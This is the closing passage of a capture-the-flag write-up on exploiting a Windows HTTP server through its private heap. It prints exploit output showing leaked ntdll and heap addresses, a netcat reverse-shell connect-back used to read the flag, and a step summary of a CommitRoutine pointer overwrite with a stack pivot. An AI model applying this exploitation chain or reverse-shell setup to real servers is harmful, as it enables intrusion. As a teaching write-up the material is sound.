[*]   'username' in heap 1 @ 0x17ccd222c80
[*]   ntdll pointer @ 0x17ccd2202c0
[*]   'password' in heap 1 @ 0x17ccd222ca0
[*]   CommitRoutine in heap 1 @ 0x17ccd220168
[+] ntdll!RtlpStaticDebugInfo leak: 0x7ff892b33d10
[+] NTDLL @ 0x7ff8929d0000
[+] ntdll!RtlpHeapKey = 0xf603ad6b90e97029
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19226
[+] Opening connection to 172.16.62.153 on port 42003: Done
[+] Opening connection to 172.16.62.153 on port 42003: Done
[*]   thread 4 addr stored in ntdll @ 0x7ff892b33bb0
check threads list
[+] target_heap @ 0x17ccd460000
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19227
[+] Opening connection to 172.16.62.153 on port 42003: Done
[+] Spawning shell...

And get the connect-back (here from the CTF server):

$ nc -lvp 1337
listening on [any] 1337 ...
connect to [212.83.129.72] from 95.230.242.35.bc.googleusercontent.com [35.242.230.95] 49729
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\winhttpd\inetpub>cd ..
C:\winhttpd>dir
 Volume in drive C has no label.
 Volume Serial Number is F845-3464

 Directory of C:\winhttpd

01/19/2019 01:07 AM <DIR> .
01/19/2019 01:07 AM <DIR> ..
01/19/2019 12:52 AM <DIR> inetpub
01/19/2019 01:06 AM 26,112 winhttpd.exe
01/18/2019 11:01 PM <DIR> wow_gg_the_flag_is_in_here
              1 File(s) 26,112 bytes
              4 Dir(s) 40,418,689,024 bytes free

C:\winhttpd>cd wow_gg_the_flag_is_in_here
C:\winhttpd\wow_gg_the_flag_is_in_here>type flag.txt
INS{HEADs I WIN, tails you lose}

In summary we used 5 requests/threads which we all kept alive throughout the exploit:

  • 1st one leaked the address of the first private heap
  • 2nd leaked NTDLL + the RtlpHeapKey value
  • 3rd leaks the address of the target heap
  • 4th has the target heap, we keep it waiting for a while then trigger a large allocation to get RIP
  • 5th uses a the arbitrary write to overwrite the mangled CommitRoutine pointer with a stack pivot

Conclusions

Of course none of this is really specific to “private” heaps. You can find the same ntdll!RtlpStaticDebugInfo pointer and CommitRoutine callback in the main heap as well πŸ™‚

Unfortunately no team was able to solve the challenge during the CTF, although it appears that several teams were pretty close!
You can find my exploit here and the sources here. It can fail sometimes because of things like occasional NULL bytes in the leaked values, but should work most of the time.